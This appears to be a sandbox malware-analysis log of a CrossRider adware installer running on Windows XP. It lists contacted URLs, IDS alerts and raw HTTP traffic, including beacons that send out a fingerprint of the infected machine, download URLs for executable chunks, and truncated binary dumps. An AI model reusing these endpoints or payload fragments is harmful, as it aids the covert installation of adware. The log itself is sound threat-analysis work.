hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001504&i=900&n=deploy_ff_start_funnel_step_name&rnd=1425597850
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001504&i=950&n=deploy_nova_ie_start_funnel_step_name&rnd=1425597850
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001504&i=1000&n=deploy_ie_start_funnel_step_name&rnd=1425597851
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001504&i=1100&n=deploy_updater_start_funnel_step_name&rnd=1425597851
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001504&i=1200&n=deploy_watchdog_start_funnel_step_name&rnd=1425597851
hxxp://s3-website-us-east-1.amazonaws.com/utility.gif?report=fdata&f=1&c=001504&i=10000&n=deploy_end_funnel_step_name&rnd=1425597852
hxxp://s3-website-us-east-1.amazonaws.com/installer.gif?action=finished&LFMR=NA&app=69829&appver=&ver=1_36_01_22&version_date=15-03-04&bic=C54C51C1259F4E0794ABE2EFF455B67AIE&verifier=c86f1da5444bc59351fec9b57e5afa7b&upi=13b4b43ecfec3569c696888aa234740e&procid=10A5CAB242474CD0AF8C45AEC9287B10PI&srcid=001504&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ua&aver=X&xpiver=0_95&crxver=1_26_23&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=85899350025&asw=0&asw2=1073750528&asw3=-2147483648&asw4=0&crtnm=BlondieProject&procstarttime=1425597843&procruntime=9&rnd=1425597852
hxxp://s3-website-us-east-1.amazonaws.com/apps.gif?action=install&app=69829&appver=&ver=1_36_01_22&version_date=15-03-04&bic=C54C51C1259F4E0794ABE2EFF455B67AIE&verifier=c86f1da5444bc59351fec9b57e5afa7b&upi=13b4b43ecfec3569c696888aa234740e&procid=10A5CAB242474CD0AF8C45AEC9287B10PI&srcid=001504&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ua&aver=X&installtime=1425597843&lifetime=0&silent=1&crtnm=BlondieProject&procstarttime=1425597843&procruntime=9&rnd=1425597852
hxxp://errors.crossrider.com/utility.gif?error=done_mem_0&report=mini_s&ver=1504&action=na&ms_vr=3&clock=20031&rnd=32150 208.85.150.249
hxxp://dl.ourgenstatsstorage.com/outil/fuully/styi2/setup.exe_b 69.16.175.10
hxxp://stats.ourinputdatastorage.com/installer.gif?action=started&app=69829&appver=0&ver=1_36_01_22&version_date=15-03-04&bic=C54C51C1259F4E0794ABE2EFF455B67AIE&verifier=c86f1da5444bc59351fec9b57e5afa7b&upi=13b4b43ecfec3569c696888aa234740e&procid=10A5CAB242474CD0AF8C45AEC9287B10PI&srcid=001504&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ua&aver=X&xpiver=0_95&crxver=1_26_23&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=85899350025&asw=0&asw2=1073750528&asw3=-2147483648&asw4=0&crtnm=BlondieProject&mdat=jSdrW1Q0dDnRMURxifDRVgYdRC8Adht035Oiv/VdBFOgcLKuVjyLkwODo3ELBZAQlAV4wQCv0/3FoAU6Nq4TyNSQ5ULHy4XmM6G655CiyH8WVw44kG0vAaSX5o9UJ3UeFRngKVmGQv7Jq3XE4lhheXPGvgKkkQlbgQ5FMRSd56ddLtowECOB76ieA27Loa1McC07VgrTuDPFJpnvsAq0gBjE7rZg&procstarttime=1425597843&procruntime=4&rnd=1425597847 54.231.64.164
hxxp://errors.ourinputdatastorage.com/utility.gif?report=fdata&f=1&c=001504&i=100&n=init_start_funnel_step_name&rnd=1425597843 54.231.12.124
hxxp://errors.ourinputdatastorage.com/installer-error.gif?action=sesamy&app=69829&appver=0&ver=1_36_01_22&version_date=15-03-04&bic=C54C51C1259F4E0794ABE2EFF455B67AIE&verifier=c86f1da5444bc59351fec9b57e5afa7b&upi=13b4b43ecfec3569c696888aa234740e&procid=10A5CAB242474CD0AF8C45AEC9287B10PI&srcid=001504&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ua&aver=X&error=0&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=85899350025&asw=0&asw2=1073750528&asw3=-2147483648&asw4=0&crtnm=BlondieProject&procstarttime=1425597843&procruntime=4&rnd=1425597847 54.231.12.124
hxxp://errors.ourinputdatastorage.com/utility.gif?report=fdata&f=1&c=001504&i=600&n=deploy_omaha_start_funnel_step_name&rnd=1425597850 54.231.12.124
hxxp://errors.ourinputdatastorage.com/utility.gif?report=fdata&f=1&c=001504&i=700&n=deploy_ch_start_funnel_step_name&rnd=1425597850 54.231.12.124
hxxp://dl.ourgenstatsstorage.com/outil/fuully/styi2/setup.exe_a 69.16.175.10
hxxp://errors.ourinputdatastorage.com/utility.gif?report=fdata&f=1&c=001504&i=1100&n=deploy_updater_start_funnel_step_name&rnd=1425597851 54.231.12.124
hxxp://errors.ourinputdatastorage.com/utility.gif?report=fdata&f=1&c=001504&i=400&n=deploy_verifier_start_funnel_step_name&rnd=1425597849 54.231.12.124
hxxp://dl.ourgenstatsstorage.com/outil/fuully/styi2/setup.exe_d 69.16.175.10
hxxp://errors.ourinputdatastorage.com/utility.gif?report=fdata&f=1&c=001504&i=10000&n=deploy_end_funnel_step_name&rnd=1425597852 54.231.12.124
hxxp://errors.ourinputdatastorage.com/utility.gif?report=fdata&f=1&c=001504&i=1000&n=deploy_ie_start_funnel_step_name&rnd=1425597851 54.231.12.124
hxxp://errors.ourinputdatastorage.com/utility.gif?report=fdata&f=1&c=001504&i=800&n=deploy_nova_start_funnel_step_name&rnd=1425597850 54.231.12.124
hxxp://errors.ourinputdatastorage.com/utility.gif?report=fdata&f=1&c=001504&i=1200&n=deploy_watchdog_start_funnel_step_name&rnd=1425597851 54.231.12.124
hxxp://errors.ourinputdatastorage.com/utility.gif?report=fdata&f=1&c=001504&i=200&n=init_end_funnel_step_name&rnd=1425597847 54.231.12.124
hxxp://errors.ourinputdatastorage.com/utility.gif?report=fdata&f=1&c=001504&i=950&n=deploy_nova_ie_start_funnel_step_name&rnd=1425597850 54.231.12.124
hxxp://stats.ourinputdatastorage.com/installer.gif?action=finished&LFMR=NA&app=69829&appver=&ver=1_36_01_22&version_date=15-03-04&bic=C54C51C1259F4E0794ABE2EFF455B67AIE&verifier=c86f1da5444bc59351fec9b57e5afa7b&upi=13b4b43ecfec3569c696888aa234740e&procid=10A5CAB242474CD0AF8C45AEC9287B10PI&srcid=001504&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ua&aver=X&xpiver=0_95&crxver=1_26_23&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=85899350025&asw=0&asw2=1073750528&asw3=-2147483648&asw4=0&crtnm=BlondieProject&procstarttime=1425597843&procruntime=9&rnd=1425597852 54.231.64.164
hxxp://stats.ourinputdatastorage.com/apps.gif?action=install&app=69829&appver=&ver=1_36_01_22&version_date=15-03-04&bic=C54C51C1259F4E0794ABE2EFF455B67AIE&verifier=c86f1da5444bc59351fec9b57e5afa7b&upi=13b4b43ecfec3569c696888aa234740e&procid=10A5CAB242474CD0AF8C45AEC9287B10PI&srcid=001504&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ua&aver=X&installtime=1425597843&lifetime=0&silent=1&crtnm=BlondieProject&procstarttime=1425597843&procruntime=9&rnd=1425597852 54.231.64.164
hxxp://errors.ourinputdatastorage.com/utility.gif?report=fdata&f=1&c=001504&i=900&n=deploy_ff_start_funnel_step_name&rnd=1425597850 54.231.12.124
hxxp://dl.ourgenstatsstorage.com/outil/fuully/styi2/setup.exe_e 69.16.175.10
hxxp://errors.ourinputdatastorage.com/utility.gif?report=fdata&f=1&c=001504&i=300&n=deploy_start_funnel_step_name&rnd=1425597848 54.231.12.124
hxxp://errors.ourinputdatastorage.com/utility.gif?report=fdata&f=1&c=001504&i=500&n=deploy_notification_start_funnel_step_name&rnd=1425597850 54.231.12.124
hxxp://logs.ourinputdatastorage.com/monetization.gif?event=3&ibic=C54C51C1259F4E0794ABE2EFF455B67AIE&verifier=c86f1da5444bc59351fec9b57e5afa7b&campaign=001504&country=ua&app=69829&os=XP32&defbro=ie&chver=na&ffver=na&iever=6.0.2900.5512&starttime=1425597843&asw=0_1073750528_-2147483648_0&browser=&rnd=1425597843 69.16.175.42
hxxp://dl.ourgenstatsstorage.com/outil/fuully/styi2/setup.exe_c 69.16.175.10


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET MALWARE Possible Windows executable sent when remote host claims to send a Text File
ET MALWARE Win32/Toolbar.CrossRider.A Checkin

Traffic

GET /monetization.gif?event=3&ibic=C54C51C1259F4E0794ABE2EFF455B67AIE&verifier=c86f1da5444bc59351fec9b57e5afa7b&campaign=001504&country=ua&app=69829&os=XP32&defbro=ie&chver=na&ffver=na&iever=6.0.2900.5512&starttime=1425597843&asw=0_1073750528_-2147483648_0&browser=&rnd=1425597843 HTTP/1.1
Host: logs.ourinputdatastorage.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Thu, 05 Mar 2015 23:24:07 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1389114507"
Last-Modified: Tue, 07 Jan 2014 17:08:27 GMT
Cache-Control: max-age=86400
Content-Length: 35
Content-Type: image/gif
X-HW: 1425597847.dop003.fr7.t,1425597847.cds021.fr7.c
GIF89a.............,...........D..;HTTP/1.1 200 OK..Date: Thu, 05 Mar 
2015 23:24:07 GMT..Keep-Alive: timeout=5, max=100..Connection: Keep-Al
ive..Accept-Ranges: bytes..ETag: "1389114507"..Last-Modified: Tue, 07 
Jan 2014 17:08:27 GMT..Cache-Control: max-age=86400..Content-Length: 3
5..Content-Type: image/gif..X-HW: 1425597847.dop003.fr7.t,1425597847.c
ds021.fr7.c..GIF89a.............,...........D..;..



GET /outil/fuully/styi2/setup.exe_e HTTP/1.1
Host: dl.ourgenstatsstorage.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Thu, 05 Mar 2015 23:23:55 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1425462000"
Last-Modified: Wed, 04 Mar 2015 09:40:00 GMT
Cache-Control: max-age=2511
Content-Length: 2530648
Content-Type: text/plain
X-HW: 1425597835.dop001.fr7.t,1425597835.cds033.fr7.sr,1425597834.dop005.dc1.r,1425597835.cds023.dc1.c,1425597835.cds033.fr7.pr
..m.8_...u.>6.....n8..H...v......r....'.....x.8..F.LJ~&Q...z..>U
.......[[email protected]....$^..1.'...g9....:<.k>...(..fB...`7...r.......
Q.:7Qiq.<..f\........WH.....m.F...Nu......O..\.m.UA$.T})_.fV}...M..
J...7....F...o...l.<...a.d..D..3...(E.T\6.>.45..'.~.4...g..F....
&.3y1b..}[email protected]......<[email protected]..}Z
...........wu.c...W..Y(6Fd....ye..........j8.j.e...v.M...:;..Q. I..E..
...o...].|.[.8%L...$.]>...5.....F.J.......3-\.;.C.<..v..)....?.{
.(c._.7t..Y...b..O.....-0...8... |..h..WU'h..1.w..h.....s.H.\8........
..~......j.sd...$._...G...9.c>.b.vh..*.r...%,..7W(.m. h...i....7..I
.U...7.c.T..&Z(.vO.r9u....4.V...-.,|C...~....N..z....V.OB$[....E.<{
......^...h..)..{A2ZE.\..Y.aq.'.. ...]..x.n.....Z...:.S.....v......l..
.C...:..oa.@.. .....'..Z.<f.....^.r;.;..'..'...G...hR.Uh.Y.........
^.g...Kx..|z....{-.k/`.....qjds.....^Xc ....#z..7_.<~,o.. ..x..t<
;.. [email protected]./..|.r.e.g&r.5....~?.0"2[S#......[..9...*8d.$2Xr.....G \..y
....P.e.. C6p.b..'h.`....@c.:.[...[......92.=>?.hA.d..Ho*..r.-..:..
..!s.L'8..... .W...1.I......>O.4....D...!...7$..e..)..s....a.V.=...
..[#oyV.......&.b..N.I....}..aS...l.Nhji........6.........9,..|..d....
.|{....H..........A].q..>..f1c..jv3.....'.*..'Q....;lr..T"......'.X
.>3.^.7.I..6Y...8..-.w.9.4h..$2.yK............S~.a>.z....5...$..
. .=..,.~.....y/iMs.W....h.b..........D......B.....$.3....E~h.h....g..
..o.0#.....M..cNUiC6}..{........WlC./...<R.Q.IAH._..*...q<.D...e
[email protected][email protected]..(.X..
<<< skipped >>>


GET /utility.gif?report=fdata&f=3&c=1504&i=10&n=ms_started&rnd=7171 HTTP/1.1
Host: errors.crossrider.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Thu, 05 Mar 2015 23:23:54 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT
Connection: close
GIF89a.............!.......,...........L..;..



GET /utility.gif?error=done_mem_0&report=mini_s&ver=1504&action=na&ms_vr=3&clock=20031&rnd=32150 HTTP/1.1
Host: errors.crossrider.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Thu, 05 Mar 2015 23:24:13 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT
Connection: close
GIF89a.............!.......,...........L..;..



GET /outil/fuully/styi2/setup.exe_b HTTP/1.1
Host: dl.ourgenstatsstorage.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Thu, 05 Mar 2015 23:23:55 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1425461993"
Last-Modified: Wed, 04 Mar 2015 09:39:53 GMT
Cache-Control: max-age=2512
Content-Length: 2530652
Content-Type: text/plain
X-HW: 1425597835.dop001.fr7.t,1425597835.cds006.fr7.sr,1425597834.dop003.dc1.r,1425597835.cds027.dc1.c,1425597835.cds006.fr7.pr
..................S....<bS.d.,.......#.....\.9....=`...az.a.Ne.....
I.Z..%.~....Ea5..P.q..;.<..,U.Y...kjO...  3o......-(..0...ll..;[.-.
...46....o...w03....]|T:{u.....Q.Q....bz.......=...S?q....f1-:T..%.%cL
o*C4.l..!.fq..Tc....X".X..ME..!..#B7.z.`e.*{.I.~\.J.0......n..d......'
^.(......ab...=.YF.\........... ........p..g..?._.._......]}.`..j.h...
L..q.c=......5..I..r1Vt.^.g.' ...}.z.......h>..@"._z..5..<.E<
.}.R..ib.p..../T.e.B.k...%.6.5:.>..r.[F@..[...w..u..=..D....4<Z6
[email protected].).{~^.r3.....#k.J.........B{....k...K.......}.`.L~.
...Dt.E../..*J.....z......Z..n.V.....Na...x.R.m~N....=..YU..... ......
..%[email protected]>.j......p.GZ../.D.T.RY..... .R..fPx.....T.......4;..
.\I..R.wH..3oj....k...9.3L\..Z....J..c...Mj.P@'...1.. ......QV......H@
UB....A.E\...v..2..[?..w.a.e.ob..Oh...h...Q..9R.......g..<.....3.!.
O.&(....4_..........2%..p..N.E..]Z.\.O..q...0.8...G.6;.9].....s.......
F|...g.B.\2.#..h?........D.<..P9J.........P..SO"T.....t....#....v.r
.....,>5..W...W... .w...[_..{Q...h......r..9..j.*...<WVH.cZ..9&.
.........b.IS.,.2..!.QE.W?._..5..0v..1....cY.....V..X....=.`.t.....nQg
.1[...<.9:.....2a$.'.1.EZ.?.,..1..~..}........B.MN.]r.........V.j5S
...Et...H.n..v.k.J.X.j....x.A.......:.......r...}.........J=./..b..../
D........-. W%z.c.1U*4...?.y...CuV.ST.x.A...$...p..)...v.....V...JF$.;
...;AhW._"[email protected].~.Z..!V..~...I....y..........266.L.
..D<s..Z..P5}.a..rH.#..}.U.......*...;q-B.de.\4..[....r>...i.p..
...(......&..o...A.yr.9....p...1.b............FW#...o.......F.Sq..
<<< skipped >>>


GET /utility.gif?error=mem_strt&report=mini_s&ver=1504&action=na&ms_vr=3&clock=7422&rnd=3827 HTTP/1.1
Host: errors.crossrider.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Server: nginx/1.6.0
Date: Thu, 05 Mar 2015 23:24:00 GMT
Content-Type: image/gif
Content-Length: 43
Last-Modified: Mon, 28 Sep 1970 06:00:00 GMT
Connection: close
GIF89a.............!.......,...........L..;..



GET /outil/fuully/styi2/setup.exe_a HTTP/1.1
Host: dl.ourgenstatsstorage.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Thu, 05 Mar 2015 23:23:55 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1425461991"
Last-Modified: Wed, 04 Mar 2015 09:39:51 GMT
Cache-Control: max-age=2511
Content-Length: 2530652
Content-Type: text/plain
X-HW: 1425597835.dop010.fr7.t,1425597835.cds002.fr7.sr,1425597835.dop010.dc1.r,1425597835.cds014.dc1.c,1425597835.cds002.fr7.pr
MZ......................@.............................................
..!..L.!This program cannot be run in DOS mode....$.......PE..L......P
.....................n......-A............@...........................
................ ..............................p......................
......................................................................
...........................text...<........................... .0`.
[email protected]$.......&.............
[email protected]@.bss..................................0..idata.......p.......
[email protected]...@....... [email protected]......
[email protected]..........................................
......................................................................
......................................................................
......................................................................
......................................................................
...............................................U..WVS.......U..E....t.
..F........T.D..H...H.......M..E..5..D..D$...$...tE..M..E.....SS...E..
.$.D$... uE..M..E......M.WW......M.)..M..NT....NP........E.....}...VT.
.......FP..E........}..VP........U.......FT.............}..........E..
M...$..|sE..E..R...D$..E..D$...$...uE.....<$...sE..E..Q.}.;}...Q...
.~X........F4..$...sE...W..........$.E......E......D$........sE.RR.FX.
.$.D$....sE..5.sE.QQ..$.|$...RR...E...$..|....D$. ....D$..D$......D$.\
.D....tE...|.......T$...$..QQ.<$...sE.S.M..E..D$...$...uE.PP1..
<<< skipped >>>


GET / HTTP/1.1
Host: ipgeoapi.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Thu, 05 Mar 2015 23:24:06 GMT
Connection: keep-alive
Content-Type: application/json;charset=utf-8
Content-Length: 40
Server: thin 1.4.1 codename Chromeo
Via: 1.1 vegur
{"country_code":222,"country_name":"UA"}HTTP/1.1 200 OK..Date: Thu, 05
 Mar 2015 23:24:06 GMT..Connection: keep-alive..Content-Type: applicat
ion/json;charset=utf-8..Content-Length: 40..Server: thin 1.4.1 codenam
e Chromeo..Via: 1.1 vegur..{"country_code":222,"country_name":"UA"}..



GET /outil/fuully/styi2/setup.exe_d HTTP/1.1
Host: dl.ourgenstatsstorage.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
Date: Thu, 05 Mar 2015 23:23:55 GMT
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Accept-Ranges: bytes
ETag: "1425461998"
Last-Modified: Wed, 04 Mar 2015 09:39:58 GMT
Cache-Control: max-age=2512
Content-Length: 2530652
Content-Type: text/plain
X-HW: 1425597835.dop008.fr7.t,1425597835.cds027.fr7.sr,1425597835.dop004.dc1.r,1425597835.cds018.dc1.c,1425597835.cds027.fr7.pr
.b....:-.\....K........J..n<.....U5r.96_.Gd..~.q...ki..z_<......
...LzcF.....q4..c.#.0E..\.O...p:LM...".0H.....6![:%..r..Z.{(.....x....
.a..Mo.s.BW...3.E>..=c.*.n=.....%.s.V......t7y.|....FF....9z......{
z...:3.. ;Z.G..a.Q..Oe..........G.e..m...v.:^.M30..-.....c.>jo,TR.^
.....m.Vb....%.z.........Dp.DE.............U....q..&.......D..o$.EC.#E
....*.. ..N.u.K.5.z..\.".I._.....up..:9..Y..B0.i...9kF.q...pc....\(v.,
.r...^z.7(.o..D..}...I..mT..X.R.s.....f...:..*R2bk..T0r0.....,....O...
...x.F....i.Q....,..9:;o.&...s...'Z...X..3.}.K..Ox!~..VQ...*.....@....
 4.#}[...J...J...*........N.4.\A..~_.b...A......V..`..6xdH....B..A..].
..VY....4Y,...~.,...A.....f..R....<N..G.OxJF...e....Y...]W...|.1...
...<....]......J....v...^>X,...}v..rN;...i..0........>..]....
...:3...E.. .....[....?.!a.3.$.C.b..N...7.........L.k/m.....kw'...No"j
D..y...0..d.@..>.iM&.W...A.Y....B.......^..U .jw....J...-M.......(.
.|....m..|-.....8.p. .{.g..i(.....~R.].:.Bl.bW.\GK1zY..3A..O....jc.I:.
..5....5........1.....Q>na..lGRDy..<.29.(....5Y...<.~.f.z....
."..a...&.{....B.....B....u.6...B.[..$.1...v...8}n.....:..*A..x......Z
y.........M"k......L=|..E....].....&k{..k.S..~...R3.w..I.....3...Y./..
s.E..>.......... ."...f..v.W..P.........GyLvwM5._..,B.BV.\.{C(....h
.c..........."..9....8.;..^.L.S...8c.d.AN..S.|$..%>Z]..5.TS}.A.F...
s.O......>....)......}2.M<#m........J.m...).X.Yl."M.U..2p... )LT
.F........&6%. .K..H.q.c.....ww...$...?|..74 FP$........{..-.........E
.i...CYh.h...Z..UK.....[............D...kV]...gS...&R4..m..&.U..w4
<<< skipped >>>


GET /utility.gif?report=fdata&f=1&c=001504&i=100&n=init_start_funnel_step_name&rnd=1425597843 HTTP/1.1
Host: errors.ourinputdatastorage.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
x-amz-id-2: 9Tcz6Ap2zlSZV0IH8Q0 cp3VYmVmZwbuStx2HER yoGe2LQ6oKSmqfJh/P dQdqy
x-amz-request-id: A16DE0E2CD020B49
Date: Thu, 05 Mar 2015 23:24:05 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 11 Mar 2014 09:25:49 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: 9Tcz6A
p2zlSZV0IH8Q0 cp3VYmVmZwbuStx2HER yoGe2LQ6oKSmqfJh/P dQdqy..x-amz-requ
est-id: A16DE0E2CD020B49..Date: Thu, 05 Mar 2015 23:24:05 GMT..Expires
: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalid
ate..Last-Modified: Tue, 11 Mar 2014 09:25:49 GMT..ETag: "28d6814f309e
a289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Se
rver: AmazonS3..GIF89a.............,...........D..;....


GET /installer-error.gif?action=sesamy&app=69829&appver=0&ver=1_36_01_22&version_date=15-03-04&bic=C54C51C1259F4E0794ABE2EFF455B67AIE&verifier=c86f1da5444bc59351fec9b57e5afa7b&upi=13b4b43ecfec3569c696888aa234740e&procid=10A5CAB242474CD0AF8C45AEC9287B10PI&srcid=001504&subid=0&zdata=0&browser=ie&browserver=6&default=ie&chver=na&ffver=na&iever=6.0.2900.5512&curtime=&country=ua&aver=X&error=0&silent=1&os=XP32&osbuild=2600&osprod=Microsoft Windows XP&ossp=Service Pack 3&osinstdt=1360584879&admin=1&type=85899350025&asw=0&asw2=1073750528&asw3=-2147483648&asw4=0&crtnm=BlondieProject&procstarttime=1425597843&procruntime=4&rnd=1425597847 HTTP/1.1


Host: errors.ourinputdatastorage.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
x-amz-id-2: hRdx8sPtaImFrGl9EBBSqJs3pgIH/3/woCiEIfFpvrikloxlO4WeiMK0y9EowX5M
x-amz-request-id: 28EEC20B1021BA7F
Date: Thu, 05 Mar 2015 23:24:08 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 11 Mar 2014 09:25:37 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: hRdx8s
PtaImFrGl9EBBSqJs3pgIH/3/woCiEIfFpvrikloxlO4WeiMK0y9EowX5M..x-amz-requ
est-id: 28EEC20B1021BA7F..Date: Thu, 05 Mar 2015 23:24:08 GMT..Expires
: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalid
ate..Last-Modified: Tue, 11 Mar 2014 09:25:37 GMT..ETag: "28d6814f309e
a289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Se
rver: AmazonS3..GIF89a.............,...........D..;....


GET /utility.gif?report=fdata&f=1&c=001504&i=200&n=init_end_funnel_step_name&rnd=1425597847 HTTP/1.1


Host: errors.ourinputdatastorage.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
x-amz-id-2: dHcCGtITcro3krS3zzCUBB/PyBJcOmeanAIOwt1zjHpRd EhrSMar7sNev tM0Zs
x-amz-request-id: 217FED2A048E8812
Date: Thu, 05 Mar 2015 23:24:08 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 11 Mar 2014 09:25:49 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....


GET /utility.gif?report=fdata&f=1&c=001504&i=300&n=deploy_start_funnel_step_name&rnd=1425597848 HTTP/1.1


Host: errors.ourinputdatastorage.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
x-amz-id-2: aiz9xgvD7qy5rUIX0A/NP8eg4AxSnrhnhzt4DhWxJ7ppeNItE57LynNWZEvIOl8x
x-amz-request-id: D9B49812856D47D8
Date: Thu, 05 Mar 2015 23:24:08 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 11 Mar 2014 09:25:49 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: aiz9xg
vD7qy5rUIX0A/NP8eg4AxSnrhnhzt4DhWxJ7ppeNItE57LynNWZEvIOl8x..x-amz-requ
est-id: D9B49812856D47D8..Date: Thu, 05 Mar 2015 23:24:08 GMT..Expires
: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalid
ate..Last-Modified: Tue, 11 Mar 2014 09:25:49 GMT..ETag: "28d6814f309e
a289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Se
rver: AmazonS3..GIF89a.............,...........D..;....


GET /utility.gif?report=fdata&f=1&c=001504&i=400&n=deploy_verifier_start_funnel_step_name&rnd=1425597849 HTTP/1.1


Host: errors.ourinputdatastorage.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
x-amz-id-2: YfZq4aAKkD0QmkGnyQLA02D8v7W7u3mF5WZSA8yXI vCjaNgLa 3AbloBTh0B/lF
x-amz-request-id: 0326DD6CDACB1E14
Date: Thu, 05 Mar 2015 23:24:10 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 11 Mar 2014 09:25:49 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;HTTP/1.1 200 OK..x-amz-id-2: YfZq4a
AKkD0QmkGnyQLA02D8v7W7u3mF5WZSA8yXI vCjaNgLa 3AbloBTh0B/lF..x-amz-requ
est-id: 0326DD6CDACB1E14..Date: Thu, 05 Mar 2015 23:24:10 GMT..Expires
: Mon, 26 Jul 1997 05:00:00 GMT..Cache-Control: no-cache, must-revalid
ate..Last-Modified: Tue, 11 Mar 2014 09:25:49 GMT..ETag: "28d6814f309e
a289f847c69cf91194c6"..Content-Type: image/gif..Content-Length: 35..Se
rver: AmazonS3..GIF89a.............,...........D..;....


GET /utility.gif?report=fdata&f=1&c=001504&i=500&n=deploy_notification_start_funnel_step_name&rnd=1425597850 HTTP/1.1


Host: errors.ourinputdatastorage.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
x-amz-id-2: pA/BMrf6nnbcsXt9aUrjBMJXCjMg/rYN0bREwFw2IFJjiNAFiGowVVRm08n4cTXj
x-amz-request-id: 782D1254A2753524
Date: Thu, 05 Mar 2015 23:24:10 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
Last-Modified: Tue, 11 Mar 2014 09:25:49 GMT
ETag: "28d6814f309ea289f847c69cf91194c6"
Content-Type: image/gif
Content-Length: 35
Server: AmazonS3
GIF89a.............,...........D..;....


GET /utility.gif?report=fdata&f=1&c=001504&i=600&n=deploy_omaha_start_funnel_step_name&rnd=1425597850 HTTP/1.1


Host: errors.ourinputdatastorage.com
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 200 OK
x-amz-id-2: tu J10nP 3UiJjMiersLzKMfUM//adluDe3txSAwe0xiPcLPCBY5gbiIfcRIhUyJ
x-amz-request-id: 856775D186715B3E
Date: Thu, 05 Mar 2015 23:24:11 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-cache, must-revalidate
